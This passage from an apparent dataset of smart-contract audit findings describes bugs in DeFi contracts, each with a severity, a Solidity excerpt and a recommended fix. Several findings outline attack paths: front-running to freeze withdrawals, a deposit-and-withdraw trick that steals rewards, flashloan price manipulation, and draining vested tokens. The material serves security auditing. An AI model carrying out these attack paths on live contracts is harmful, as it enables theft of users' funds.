When the loop is finished, the code just returns the baseImageURI, which is a Hats-level fallback, rather than top hat level fallback. As a result, the image displayed will not be correct when querying for a level above 0, when all levels except level 0 have no registered image.","Before returning the baseImageURI, check if level 0 admin has a registered image.",,"```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n" +Fetching of hat status may fail due to lack of input sanitization,low,"The functions `_isActive()` and `_isEligible()` are used by `balanceOf()` and other functions, so they should not ever revert. 
However, they perform ABI decoding from external inputs.\\n```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(""getHatStatus(uint256)"", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n\\nIf toggle returns invalid return data (whether malicious or by accident), `abi.decode()` would revert causing the entire function to revert.",Wrap the decoding operation for both affected functions in a try/catch statement. Fall back to the `_getHatStatus()` result if necessary. Checking that returndata size is correct is not enough as bool encoding must be 64-bit encoded 0 or 1.,,"```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(""getHatStatus(uint256)"", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n" +Attacker can take over GMXAdapter implementation contract,low,"GMXAdapter inherits from BaseExchangeAdapter. It is an implementation contract for a transparent proxy and has the following initializer:\\n```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n\\nTherefore, an attacker can call initialize() on the implementation contract and become the owner. At this point they can do just about anything to this contract, but it has no impact on the proxy as it is using separate storage. If there was a delegatecall coded in GMXAdapter, attacker could have used it to call an attacker's contract and execute the SELFDESTRUCT opcode, killing the implementation. 
With no implementation, the proxy itself would not be functional until it is updated to a new implementation. It is ill-advised to allow anyone to have control over implementation contracts as future upgrades may make the attack surface exploitable.",The standard approach is to call from the constructor the _disableInitializers() from Open Zeppelin's Initializable module,,```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n +disordered fee calculated causes collateral changes to be inaccurate,high,"`_increasePosition()` changes the Hedger's GMX position by sizeDelta amount and collateralDelta collateral. There are two collateralDelta corrections - one for swap fees and one for position fees. Since the swap fee depends on up-to-date collateralDelta, it's important to calculate it after the position fee, contrary to the current state. In practice, it may lead to the leverage ratio being higher than intended as collateralDelta sent to GMX is lower than it should be.\\n```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\n",Flip the order of `getSwapFeeBP()` and `_getPositionFee()`.,,"```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\n" +small LP providers may be unable to withdraw their deposits,medium,"In LiquidityPool's initiateWithdraw(), it's required that withdrawn 
value is above a minimum parameter, or that withdrawn tokens is above the minimum parameter.\\n```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n\\nThe issue is that minDepositWithdraw is measured in dollars while amountLiquidityToken is LP tokens. The intention was that if LP tokens lost value and a previous deposit is now worth less than minDepositWithdraw, it would still be withdrawable. However, the current implementation doesn't check for that correctly, since the LP to dollar exchange rate at deposit time is not known, and is practically being hardcoded as 1:1 here. The impact is that users may not be able to withdraw LP with the token amount that was above the minimum at deposit time, or vice versa",Consider calculating an average exchange rate at which users have minted and use it to verify withdrawal amount is satisfactory.,,"```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n" +"base to quote swaps trust GMX-provided minPrice and maxPrice to be correct, which may be manipulated",medium,"exchangeFromExactBase() in GMXAdapter converts an amount of base to quote. It implements slippage protection by using the GMX vault's getMinPrice() and getMaxPrice() utilities. However, such protection is insufficient because GMX prices may be manipulated. Indeed, GMX supports “AMM pricing” mode where quotes are calculated from Uniswap reserves. A possible attack would be to drive up the base token (e.g. ETH) price, sell a large ETH amount to the GMXAdapter, and repay the flashloan used for manipulation. 
exchangeFromExactBase() is attacker-reachable from LiquidityPool's exchangeBase().\\n```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\n","Verify `getMinPrice()` and `getMaxPrice()` outputs are close to Chainlink-provided prices as done in `getSpotPriceForMarket()`.",,```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\n +recoverFunds() does not handle popular ERC20 tokens like BNB,medium,"recoverFunds() is used for recovery in case of mistakenly-sent tokens. However, it uses unsafe transfer to send tokens back, which will not support 100s of non-compatible ERC20 tokens. Therefore it is likely unsupported tokens will be unrecoverable.\\n```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\n",Use Open Zeppelin's SafeERC20 encapsulation of ERC20 transfer functions.,,"```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\n" +setPositionRouter leaks approval to previous positionRouter,low,"positionRouter is used to change GMX positions in GMXFuturesPoolHedger. It can be replaced by a new router if GMX redeploys, for example if a bug is found or the previous one is hacked. The new positionRouter receives approval from the contract. 
However, approval to the previous positionRouter is not revoked.\\n```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n\\nA number of unlikely, yet dire scenarios could occur.",Use router.denyPlugin() to remove privileges from the previous positionRouter.,,```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n +PoolHedger can receive ETH directly from anyone,low,"A `receive()` function has been added to GMXFuturesPoolHedger, so that it is able to receive ETH from GMX as request refunds. However, it is not advisable to have an open `receive()` function if it is not necessary. Users may wrongly send ETH directly to PoolHedger and lose it forever.\\n```\\n receive() external payable {}\\n```\\n","Add a msg.sender check in the receive() function, and make sure sender is positionRouter.",,```\\n receive() external payable {}\\n```\\n +Attacker can freeze profit withdrawals from V3 vaults,high,"Users of Ninja can use Vault's `withdrawProfit()` to withdraw profits. It starts with the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nIf attacker can front-run user's `withdrawProfit()` TX and set lastProfitTime to block.timestamp, they would effectively freeze the user's yield. That is indeed possible using the Vault paired strategy's `harvest()` function. It is permissionless and calls `_harvestCore()`. The attack path is shown in bold.\\n```\\n function harvest() external override whenNotPaused returns (uint256 callerFee) {\\n require(lastHarvestTimestamp != block.timestamp);\\n uint256 harvestSeconds = lastHarvestTimestamp > 0 ? 
block.timestamp \\n - lastHarvestTimestamp : 0;\\n lastHarvestTimestamp = block.timestamp;\\n uint256 sentToVault;\\n uint256 underlyingTokenCount;\\n (callerFee, underlyingTokenCount, sentToVault) = _harvestCore();\\n emit StrategyHarvest(msg.sender, underlyingTokenCount, \\n harvestSeconds, sentToVault);\\n }\\n```\\n\\n```\\n function _harvestCore() internal override returns (uint256 callerFee, uint256 underlyingTokenCount, uint256 sentToVault)\\n {\\n IMasterChef(SPOOKY_SWAP_FARM_V2).deposit(POOL_ID, 0);\\n _swapFarmEmissionTokens();\\n callerFee = _chargeFees();\\n underlyingTokenCount = balanceOf();\\n sentToVault = _sendYieldToVault();\\n } \\n```\\n\\n```\\n function _sendYieldToVault() internal returns (uint256 sentToVault) {\\n sentToVault = IERC20Upgradeable(USDC).balanceOf(address(this));\\n if (sentToVault > 0) {\\n IERC20Upgradeable(USDC).approve(vault, sentToVault);\\n IVault(vault).depositProfitTokenForUsers(sentToVault);\\n }\\n }\\n```\\n\\n```\\n function depositProfitTokenForUsers(uint256 _amount) external nonReentrant {\\n if (_amount == 0) {\\n revert NYProfitTakingVault__ZeroAmount();\\n }\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n if (msg.sender != strategy) {\\n revert NYProfitTakingVault__OnlyStrategy();\\n }\\n uint256 totalShares = totalSupply();\\n if (totalShares == 0) {\\n lastProfitTime = block.timestamp;\\n return;\\n }\\n accProfitTokenPerShare += ((_amount * PROFIT_TOKEN_PER_SHARE_PRECISION) / totalShares);\\n lastProfitTime = block.timestamp;\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n }\\n```\\n",Do not prevent profit withdrawals during lastProfitTime block.,,```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n +Lack of child 
rewarder reserves could lead to freeze of funds,high,"In ComplexRewarder.sol, `onReward()` is used to distribute rewards for previous time period, using the complex rewarder and any child rewarders. If the complex rewarder does not have enough tokens to hand out the reward, it correctly stores the rewards owed in storage. However, child rewarder will attempt to hand out the reward and may revert:\\n```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n\\nImportantly, if the child rewarder fails, the parent's `onReward()` reverts too:\\n```\\n uint len = childrenRewarders.length();\\n for (uint i = 0; i < len; ) {\\n IRewarder(childrenRewarders.at(i)).onReward(_pid, _user, _to, 0, \\n _amt);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nIn the worst-case scenario, this will lead the user's `withdraw()` call to V3 Vault, to revert.","Introduce sufficient exception handling in the ComplexRewarder.sol contract, so that `onReward()` would never fail.",,"```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n 
user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n" +Wrong accounting of user's holdings allows theft of reward,high,"In `deposit()`, `withdraw()` and `withdrawProfit()`, `rewarder.onReward()` is called for reward bookkeeping. It will transfer previous eligible rewards and update the current amount user has:\\n```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n\\nIn `withdraw()`, there is a critical issue where `onReward()` is called too early:\\n```\\n // Update rewarder for this user\\n if (address(rewarder) != address(0)) {\\n rewarder.onReward(0, msg.sender, msg.sender, pending, user.amount);\\n }\\n // Burn baby burn\\n _burn(msg.sender, _shares);\\n // User accounting\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nThe new _amt which will be stored in reward contract's user.amount is vault's user.amount, before decrementing the withdrawn amount. Therefore, the withdrawn amount is still gaining rewards even though it's no longer in the contract. Effectively it is stealing the rewards of others, leading to reward insolvency. In order to exploit this flaw, attacker will deposit a larger amount and immediately withdraw it, except for one wei. 
When they would like to receive the rewards accrued for others, they will withdraw the remaining wei, which will trigger `onReward()`, which will calculate and send pending awards for the previously withdrawn amount.",Move the `onReward()` call to after user.amount is updated.,,```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n +Unsafe transferFrom breaks compatibility with 100s of ERC20 tokens,medium,"In Ninja vaults, the delegated strategy sends profit tokens to the vault using `depositProfitTokenForUsers()`. The vault transfers the tokens in using:\\n```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n\\nThe issue is that the code doesn't use the `safeTransferFrom()` utility from SafeERC20. Therefore, profitTokens that don't return a bool in `transferFrom()` will cause a revert which means they are stuck in the strategy. Examples of such tokens are USDT, BNB, among hundreds of other tokens.",Use `safeTransferFrom()` from SafeERC20.sol,,"```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n" +Attacker can force partial withdrawals to fail,medium,"In Ninja vaults, users call `withdraw()` to take back their deposited tokens. 
There is bookkeeping on remaining amount:\\n```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nIf the withdraw is partial (some tokens are left), user.amount is decremented by r.\\n```\\n uint256 r = (balance() * _shares) / totalSupply();\\n```\\n\\nAbove, r is calculated as the relative share of the user's _shares of the total balance kept in the vault.\\nWe can see that user.amount is incremented in deposit().\\n```\\n function deposit(uint256 _amount) public nonReentrant {\\n …\\n user.amount += _amount;\\n …\\n }\\n```\\n\\nThe issue is that the calculated r can be more than _amount , causing an overflow in `withdraw()` and freezing the withdrawal. All attacker needs to do is send a tiny amount of underlying token directly to the contract, to make the shares go out of sync.","Redesign user structure, taking into account that balance of underlying can be externally manipulated",,```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n +Rewards may be stuck due to unchangeable slippage parameter,medium,"In NyPtvFantomWftmBooSpookyV2StrategyToUsdc.sol, MAX_SLIPPAGE is used to limit slippage in trades of BOO tokens to USDC, for yield:\\n```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, 
amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n\\nIf slippage is not satisfied the entire transaction reverts. Since MAX_SLIPPAGE is constant, it is possible that harvesting of the strategy will be stuck, due to operations leading to too high of a slippage. For example, strategy might accumulate a large amount of BOO, or `harvest()` can be sandwich-attacked.",Allow admin to set slippage after some timelock period.,,"```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n" +potential overflow in reward accumulator may freeze functionality,medium,"Note the above description of `updatePool()` functionality. 
We can see that accRewardPerShare is only allocated 128 bits in PoolInfo:\\n```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n\\nTherefore, even if truncation issues do not occur, it is likely that continuous incrementation of the counter would cause accRewardPerShare to overflow, which would freeze vault functionalities such as withdrawal.","Steal 32 bits from lastRewardTime and 32 bits from allocPoint to make the accumulator have 192 bits, which should be enough for safe calculations.",,```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n +"when using fee-on-transfer tokens in VaultV3, capacity is limited below underlyingCap",low,"Vault V3 documentation states it accounts properly for fee-on-transfer tokens. It calculates actual transferred amount as below:\\n```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n\\nA small issue is that underlyingCap is compared to the _amount before correction for actual transferred amount. 
Therefore, it cannot actually be reached, and limits the maximum capacity of the vault to underlyingCap minus a factor of the fee %.",Move the underlyingCap check to below the effective _amount calculation,,"```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n" +Redundant checks in Vault V3,low,"`depositProfitTokenForUsers()` and `withdrawProfit()` contain the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nHowever, lastProfitTime is only ever set to block.timestamp. Therefore, it can never be larger than block.timestamp.",It would be best in terms of gas costs and logical clarity to change the comparison to !=,,```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n +createUniswapRangeOrder() charges manager instead of pool,high,"_createUniswapRangeOrder() can be called either from manager flow, with createUniswapRangeOrder(), or pool-induced from hedgeDelta(). The issue is that the function assumes the sender is the parentLiquidityPool, for example:\\n```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n\\nBalance check is done on pool, but money is transferred from sender. 
It will cause the order to use manager's funds.\\n```\\n function createUniswapRangeOrder(\\n RangeOrderParams calldata params,\\n uint256 amountDesired\\n ) external {\\n require(!_inActivePosition(), ""RangeOrder: active position"");\\n _onlyManager();\\n bool inversed = collateralAsset == address(token0);\\n _createUniswapRangeOrder(params, amountDesired, inversed);\\n }\\n```\\n",Ensure safeTransfer from uses parentLiquidityPool as source.,,"```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n" +"hedgeDelta() priceToUse is calculated wrong, which causes bad hedges",high,"When _delta parameter is negative for `hedgeDelta()`, priceToUse will be the minimum between quotePrice and underlyingPrice.\\n```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n\\nThis works fine when direction is BELOW, because the calculated lowerTick and upperTick from _getTicksAndMeanPriceFromWei are guaranteed to be lower than current price.\\n```\\n int24 lowerTick = direction == RangeOrderDirection.ABOVE ? \\n nearestTick + tickSpacing : nearestTick - (2 * tickSpacing);\\n int24 tickUpper = direction ==RangeOrderDirection.ABOVE ? lowerTick + \\n tickSpacing : nearestTick - tickSpacing;\\n```\\n\\nTherefore, the fulfill condition is not true and we mint from the correct base. 
However, when direction is ABOVE, it is possible that the oracle supplied price (underlyingPrice) is low enough in comparison to pool price, that the fulfill condition is already active. In that case, the contract tries to mint from the wrong asset which will cause the wrong tokens to be sent in. In effect, the contract is not hedging. A similar situation occurs when _delta parameter is greater than zero.",Verify the calculated priceToUse is on the same side as pool-calculated tick price.,,"```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n" +multiplication overflow in getPoolPrice() likely,medium,"`getPoolPrice()` is used in hedgeDelta to get the price directly from Uniswap v3 pool:\\n```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n\\nThe issue is that calculation of p is likely to overflow. 
sqrtPriceX96 has 96 bits for decimals, 10** `token0.decimals()` will have 60 bits when decimals is 18, therefore there is only (256 - 2 * 96 - 60) / 2 = 2 bits for non-decimal part of sqrtPriceX96.",Consider converting the sqrtPrice to a 60x18 format and performing arithmetic operations using the PRBMathUD60x18 library.,,"```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n" +Hedging won't work if token1.decimals() < token0.decimals(),medium,"`tickToToken0PriceInverted()` performs some arithmetic calculations. It's called by `_getTicksAndMeanPriceFromWei()`, which is called by `hedgeDelta()`. This line can overflow:\\n```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n\\nAlso, this line would revert even if the above calculation was done correctly:\\n```\\n meanPrice = OptionsCompute.convertFromDecimals(meanPrice, \\n token0.decimals(), token1.decimals());\\n```\\n\\n```\\n function convertFromDecimals(uint256 value, uint8 decimalsA, uint8 decimalsB) internal pure\\n returns (uint256) {\\n if (decimalsA > decimalsB) {\\n revert();\\n }\\n …\\n```\\n\\nThe impact is that when `token1.decimals()` < `token0.decimals()`, the contract's main function is unusable.","Refactor the calculation to support different decimals combinations. Additionally, add more comprehensive tests to detect similar issues in the future.",,```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n +Overflow danger in _sqrtPriceX96ToUint,medium,"_sqrtPriceX96ToUint will only work when the non-fractional component of sqrtPriceX96 takes up to 32 bits. This represents a price ratio of 18446744073709551616. 
With different token digits it is not unlikely that this ratio will be crossed which will make hedgeDelta() revert.\\n```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\n",Perform the multiplication after converting the numbers to 60x18 variables,,"```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\n" +Insufficient dust checks,low,"In `hedgeDelta()`, there is a dust check in the case of sell wETH order:\\n```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n\\nHowever, the actual used amount is _delta\\n```\\n uint256 deltaToUse = _delta > int256(wethBalance) ? wethBalance : \\n uint256(_delta);\\n _createUniswapRangeOrder(rangeOrder, deltaToUse, inversed);\\n```\\n\\nThe check should be applied on deltaToUse rather than wethBalance because it will be the minimum of wethBalance and _delta. Additionally, there is no corresponding check for minting with collateral in case _delta is negative.",Correct current dust checks and add them also in the if clause.,,```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n +Linear vesting users may not receive vested amount,high,"TokenTransmuter supports two types of transmutations, linear and instant. In linear, allocated amount is released across time until fully vested, while in instant the entire amount is released immediately. 
transmuteLinear() checks that there is enough output tokens left in the contract before accepting transfer of input tokens.\\n```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n ""INSUFFICIENT_OUTPUT_TOKEN"");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n\\nHowever, `transmuteInstant()` lacks any remaining balance checks, and will operate as long as the function has enough output tokens to satisfy the request.\\n```\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n SafeERC20.safeTransfer(IERC20(outputTokenAddress), msg.sender, \\n allocation);\\n emit OutputTokenInstantReleased(msg.sender, allocation, \\n outputTokenAddress);\\n```\\n\\nAs a result, it is not ensured that tokens that have been reserved for linear distribution will be available when users request to claim them. An attacker may empty the output balance with a large instant transmute and steal future vested tokens of users.","In transmuteInstant, add a check similar to the one in transmuteLinear. It will ensure allocations are kept faithfully.",,"```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n ""INSUFFICIENT_OUTPUT_TOKEN"");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n" +Multiplier implementation causes limited functionality,low,"linearMultiplier and instantMultiplier are used to calculate output token amount from input token amount in transmute functions.\\n```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n\\nThe issue is that they are uint256 variables and can only multiply _inputTokenAmount, not divide it. 
